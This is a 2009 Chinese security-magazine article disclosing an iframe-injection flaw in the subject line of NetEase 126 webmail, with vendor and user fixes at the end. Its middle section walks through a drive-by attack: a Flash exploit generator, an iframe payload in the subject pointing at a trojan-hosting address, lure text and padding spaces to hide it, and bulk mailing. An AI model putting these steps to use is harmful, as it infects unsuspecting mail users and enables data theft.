126邮箱 病毒的“堰塞湖”
安全阵线
本期主角 126邮箱
问题所在 IFRAME代码过滤不严
主要危害 进行挂马攻击
调研时间 2009.8.14~2009.8.17
漏洞状况 已通知修复
相信大家都听说过网易的126邮箱(图1),最近我们的安全研究人员发现了它的一个挂马漏洞,而且是可以大规模传播的那种,更要命的是操作特别简单。如果这个漏洞被盗号的黑客知道,他们会取一些特别诱人的标题,然后利用邮件群发器群发出去,病毒就如同堰塞湖崩溃般入侵广大126邮箱用户的电脑。
我叫袁羲,是一名安全研究人员,我对邮箱安全方面比较关注。最近网上在传网易的126邮箱有漏洞,听到这个消息我将信将疑,于是对126邮箱进行了安全测试,没有想到还真发现了问题,不过我也证实了网上流传的漏洞是捏造的,根本不存在。下面,我就给大家展示我挖到的126邮箱跨站挂马漏洞。
126邮箱中发现漏洞
我在邮件正文中输入常见的一些跨站挂马的代码,测试后发现126邮箱能够过滤,说明网上的说法是错误的。变换了多种跨站的语言,都没有发现问题,就在我要放弃的时候,我突然注意到邮件的主题好像可以使用HTML代码,这里会不会有问题?
我在邮件的主题中输入<IFRAME SRC="http://www.google.cn/"></IFRAME>(图2),发送该邮件到我的另外一个126邮箱,接着打开该邮件,126邮箱正常解析了IFRAME代码,邮件中已经可以看到谷歌的网站。
在浏览器中点击右键,选择菜单中的“属性”可以看到谷歌的链接地址(图3),这意味着当用户打开含有这种框架结构的邮件后,浏览器就会在用户不知情的情况下自动加载谷歌页面。在IE临时文件夹中的Cookie中,我找到了加载Google页面的相关信息(图4)。
安全小百科:导致126邮箱出现挂马漏洞的原因,是邮箱对邮件主题过滤不严,允许IFRAME代码执行,间接导致用户打开了IFRAME嵌套的挂马地址。这就如同你一直信任某家医院,但是这家医院却疏于做内部检查,导致假冒医生可以在医院内部开设虚假诊所,打着这家医院的旗号欺骗患者。
实测126邮箱挂马
黑客如何利用126邮箱跨站漏洞传播病毒呢?看了我的测试你就明白了。
步骤1:最新的Flash 漏洞是当下最受黑客喜欢的漏洞,使用频率很高,这里我们就用它来制作网页木马。黑客用特制的Flash 漏洞生成工具,生成一个PDF文件,这个PDF文件中包含有Flash元素,当用户打开浏览或者下载该PDF时就会激活木马。我从网上下载了一款Flash 漏洞生成器,在“生成”中输入木马的地址(该木马已经上传到指定的网站空间中),点击“生成”按钮即可(图5)。
步骤2:在网易126邮箱中注册一个账号(图6)。账号注册后,点击左侧菜单中的“写信”按钮,在写信窗口的“主题”输入栏中输入<IFRAME SRC="http://网页木马地址/"></IFRAME>。
步骤3:在我实际测试时发现,虽然可以直接将IFRAME代码写在主题中,但是这样很容易引起收信人的怀疑,因此我进行了伪装,在IFRAME框架代码前加入一些迷惑性的语句,例如“尊敬的网易用户”、“网吧门视频”等,写入15个字左右的汉字,再添加一些空格键, IFRAME框架代码就无法直接看到了(图7)
最后通过邮件列表(或者是邮件群发器),将这封邮件大规模地发送即可。可以想象,如果黑客通过该漏洞进行大规模的跨站挂马,一定会有大量经受不住诱惑的用户中毒,从而导致个人信息的丢失。
漏洞解决方案
网易要补上126邮箱中的漏洞,就必须对IFRAME代码进行严格的过滤,不允许用户随意调用该代码中的网址。此外,要定期对网站的程序进行安全检测,及时发现问题早日解决。对普通用户而言,上网时一定要开启杀毒软件的实时监控功能,最好使用带网页木马拦截功能的安全辅助工具。遇到网址,不要盲目点击,先看看网址是不是被加密过,如果网址被加密过就最好不要点击。